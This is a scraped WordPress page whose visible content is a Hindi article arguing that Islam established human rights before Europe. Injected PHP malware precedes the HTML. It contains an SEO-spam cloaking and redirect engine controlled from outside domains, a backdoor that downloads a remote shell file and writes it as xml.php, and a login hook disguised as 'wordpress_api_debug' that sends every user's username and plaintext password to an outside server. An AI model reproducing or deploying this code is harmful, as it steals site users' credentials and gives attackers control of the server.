if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!doctype html > <!--[if IE 8]> <html class="ie8" lang="en"> <![endif]--> <!--[if IE 9]> <html class="ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html lang="en-US"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="pingback" href="https://muslimera.com/xmlrpc.php" /> <title>मानव अधिकार सच के आइने में। – Muslim Era
Wednesday, March 29, 2023
Home मुस्लिम एरा लेख मानव अधिकार सच के आइने में।

मानव अधिकार सच के आइने में।

941
0

मानव अधिकारों पर अब लंबी बहस है और कहां इसे उल्लंघन माना जायेगा और कहां इसे न्याय की श्रेणी में ला दिया जाएगा यह उल्लंघन करने वाले की ताक़त पर निर्भर करता है ,कहीं बेकसूरों का खून अस्पतालों पर बम गिरा कर स्कूलों को मिसाइल का निशाना बना कर किया जायेगा किसी आतंकवाद के विनाश के नाम पर और कहां सिर्फ किसी मामले को मानवाधिकारों से जोड़ा जाएगा यह तय नहीं है,लेकिन जहां से यह पूरी परिकल्पना ली गई है वहां ऐसा हरगिज नहीं है वहां इसको पूरी तरह उल्लेखित किया गया है,आप सोच रहे होंगे कि मैं यूरोप की बात करूंगा जी नहीं वहां तो यह सोच 17वी शताब्दी में आई और 17वी शताब्दी में सिर्फ यह बात ही तक सीमित था और 18वी शताब्दी के अंत आते आते अमेरिका और फ्रांस के संविधानों में इसका ऐलान हो सका लेकिन यह मानवाधिकारों का ऐलान इस्लाम ने पहले ही कर दिया और आखरी नबी ने जब मदीना स्टेट कायम किया तो इसे पूरी तरह से लागू किया गया ।खुद को आधुनिक कहने वालों ने यह विचार भी इस्लाम से ही लिया ।यह दावा कि यह विचार अंग्रेज़ों द्वारा बनाये मैगनाकारटा के जरिए हुआ जबकि यह इस्लाम द्वारा इसकी पूर्ण व्यवस्था करने के 600 साल बाद की बात है ।
जहालत के दौर में जब इस्लाम की रोशनी बिखरी तो मानवअधिकार यानी इन्सान की हैसियत से इन्सान के अधिकार को लोगो ने न सिर्फ जाना बल्कि इसे पाकर अपनी दुनिया बदली उनमें पहला अधिकार ज़िंदा रहने का अधिकार सभी को है यानी इन्सानी जान के आदर का कतव्र्य हैं। कुरआन में फरमाया गया हैं कि ‘‘ जिस आदमी ने किसी एक इन्सान को कत्ल किया, बगैर इसके कि उससे किसी जान का बदला लेना हो, या वह जमीन मे फसाद फलाने का मुजरिम हो, उसने मानों तमाम इन्सानों को कत्ल कर दिया’’ (5:32) अब इस बात का फैसला अदालत को करना है ,और अगर किसी कौम से जंग हो तो एक बाकायदा हुकूमत ही इसका फैसला कर सकती है। बहरहाल किसी आदमी को व्यक्तिगत रूप से यह अधिकार नही हैं कि खून का बदला ले या जमीन मे फसाद फैलाने की सजा दें। इसलिए हर इन्सान पर यह वाजिब हैं कि वह हरगिज किसी इन्सान का कत्ल न करे। इसी बात को दूसरी जगह पर कुरआन में इस तरह दुहराया गया हैं-
‘‘किसी जान को हक के बगैर कत्ल न करो, जिसे अल्लाह ने हराम किया हैं।’’ (6:152) और अल्लाह के रसूल (सल्ल0) ने किसी जान के कत्ल को शिर्क के बाद सब से बड़ा गुनाह करार दिया है।’’ सबसे बड़ा गुनाह अल्लाह के साथ शिर्क और किसी ‘नफ़्स’ को कत्ल करना हैं।’’इस्लाम ने यह बात इस्लाम के अनुयायियों के लिए नहीं बल्कि कुल मानवजाति के लिए कही।
जान की हिफाजत का हक़ कुरआन में जहां बेगुनाह के क़त्ल को इन्सानियत का कत्ल कहा गया वहीं उसके फौरन बाद यह फरमाया गया हैं कि ‘‘ और जिसने किसी नफ़स को बचाया उसने मानों तमाम इन्सानों को जिन्दगी बख्शी ।’’(5:32) यानी साफ तौर से कुरआन ने लोगों की ज़िन्दगी बचाने का हुक्म दिया चाहे वह किसी नसल का रंग का जाती का और धर्म का हो।
इस्लाम ने औरतों की इज्जत का हुक्म दिया औरत की अस्मत और इज्ज्त हर हाल मे महफूज़ रखनी हैं, चाहे औरत अपनी कौम की हो, या दुश्मन कौम की, जंगल बियाबान मे मिले या फतह किये हुये शहर में, हमारी अपने मजहब की हो या दूसरे मजहब से उसका ताल्लुक हो, या उसका कोई भी मजहब हो, मुसलमान किसी हाल में भी उस पर हाथ नही डाल सकता। उसके लिये जिना को हर हाल में हराम किया गया हैं चाहे यह कुकर्म किसी भी औरत से किया जाये। कुरआन के शब्द हैं-’’ जिना के करीब भी न फटको। (17:32) और उसके साथ ही यह भी किया गया हैं कि इस काम की सजा मुकर्रर कर दी गई। यह हुक्म किसी शर्त के साथ बन्धा हुआ नही हैं। औरत की अस्मत और इज्जत पर हाथ डालना हर हालत में मना हैं और अगर कोई मुसलमान इस काम को करता हैं तो वह इस की सजा से नही बच सकता, चाहे दुनिया मे सजा पाये या आखिरत में।
इस्लाम ने परहेशानहाल लोगों और गरीबों को हक़ दिया मांगने वाले और तंगदस्त का यह हक हैं कि उसकी मदद की जाये कुरआन मे यह हुक्म दिया गया हैं कि ‘‘ और मुसलमानों के मालों में मदद मांगने वाले और महरूम रह जाने वाले का हक हैं। ‘‘(05:19) यह हक इस्लाम ने स्थापित किया।
इंसानों को गुलामी से आजादी का परवाना इस्लाम ने दिया अल्लाह के रसूल ने साफ ने कहा” तीन किस्म के लोग है जिन के खिलाफ कियामत के दिन मै खुद इस्तिगासा दायर करूंगा। उनमें से एक वह आदमी हैं, जो किसी आजाद इन्सान को पकड़ कर बेचे और उसकी कीमत खाये। यहां भी किसी भी इंसान के बारे में निर्देश है न कि मुसलमानों के लिए यानी इस्लाम ने हर इन्सान को उसकी वैक्तिक आजादी का हक़ दे दिया अरब में जो लोग गुलाम थे, उनके मामले को इस्लाम ने इस तरह हल किया कि हर मुमकिन तरीको से उनको आजाद करने की प्रेरणा दी । लोगो को हुक्म दिया गया कि अपने कुछ गुनाहों के प्रायश्चित के तौर पर उनको आजाद करें। अपनी खुशी से खुद किसी गुलाम को आजाद करना एक बड़ी नेकी का काम करार दिया गया। यहां तक कहा गया कि आजाद करने वाले का हर अंग उस गुलाम के हर अंग के बदले में दोजख से बच जायेगा। इसका नतीजा यह हुआ कि ‘‘ खिलाफते राशिदा’’ के दौर तक पहुंचते-पहुंचते अरब के तमाम पुराने गुलाम आजाद हो गये।जबकि खुद को आधुनिक कहने वाले लोगों को गुलाम बनाए हुए थे और हम भारत के लोगों ने भी अंग्रेज़ों की यातनापूर्ण दासता को भोगा है यह बहुत पुरानी बात नहीं है।
इस्लाम ने हर व्यक्ति को समान न्याय प्राप्त करने का अवसर प्रदान किया यह एक बहुत ज़रूरी अधिकार हैं, जो इस्लाम ने इन्सान को इन्सान होने की हैसियत से दिया हैं। कुरआन में आया हैं कि ‘‘ किसी गिरोह, की दुश्मनी तुम्हे इतना न भड़का दे……………..कि तुम नामुनासिब ज्यादती करने लगो।’’ (5:8) आगे चल कर इसी सिलसिले मे फिर फरमाया, ‘‘और किसी गिरोह की दुश्मनी तुम को इतना उत्तेजित न कर दें कि तुम इन्साफ से हट जाओ, इन्साफ करो, यही धर्म परायणता से करीबतर हैं।’’ (5:8) एक और जगह फरमाया गया हैं कि ‘‘ ऐ लोगो! जो इमान लाये हो, इन्साफ करने वाले और खुदा के वास्ते गवाह बनो।’’(5:8) यानी इस्लाम ने स्पष्ट रूप से सभी को न्याय प्राप्त करने का अधिकार दिया यह एक क्रांति थी जो इस्लाम से पहले कहीं नहीं थी
इस्लाम न सिर्फ यह कि किसी रंग व नस्ल के भेद-भाव के बगैर तमाम इन्सानों के बीच बराबरी को मानता हैं, बल्कि उसे एक महत्वपूर्ण सत्य नियम करार देता हैं। कुरआन में अल्लाह ने फरमाया हैं कि ‘‘ ऐ इन्सानों! हम ने तुम को एक मां और एक बाप से पैदा किया।’’ ‘‘ और हमने तुम को कौमों और कबीलों में बांट दिया, ताकि तुम एक दूसरे को पहचानों। ‘‘(49:13) यानी कौमों और कबीलो में यह तक्सीम पहचान के लिए हैं। इसलिए हैं कि एक कबीलों या एक कौम के लोग आपस मे एक दूसरे से परिचित हो और आपस मे सहयोग कर सके। यह इसलिए नही हैं कि एक कौम दूसरी कौम पर बड़ाई जताये और उसके साथ घमण्ड से पेश आये, उसको कमजोर और नीचा समझे और उसके अधिकारों पर डाके मारे। ‘‘ हकीकत में तुममें इज्ज्त वाला वह हैं, जो तुम में सब से ज्यादा खुदा से डरने वाला है।’’(49:13) यानी इन्सान पर इन्सान की बड़ाई सिर्फ पाक़ीजा किरदार और अच्छे आचरण की बिना पर हैं, न कि रंग व नस्ल जुबान या वतन की बिना पर। इसी बात को अल्लाह के रसूल ने अपने आखरी खुतबे में बयान फरमाया हैं कि-
